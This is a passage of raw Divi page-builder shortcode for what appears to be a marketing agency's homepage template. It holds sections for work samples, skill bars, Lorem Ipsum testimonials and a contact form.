aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" 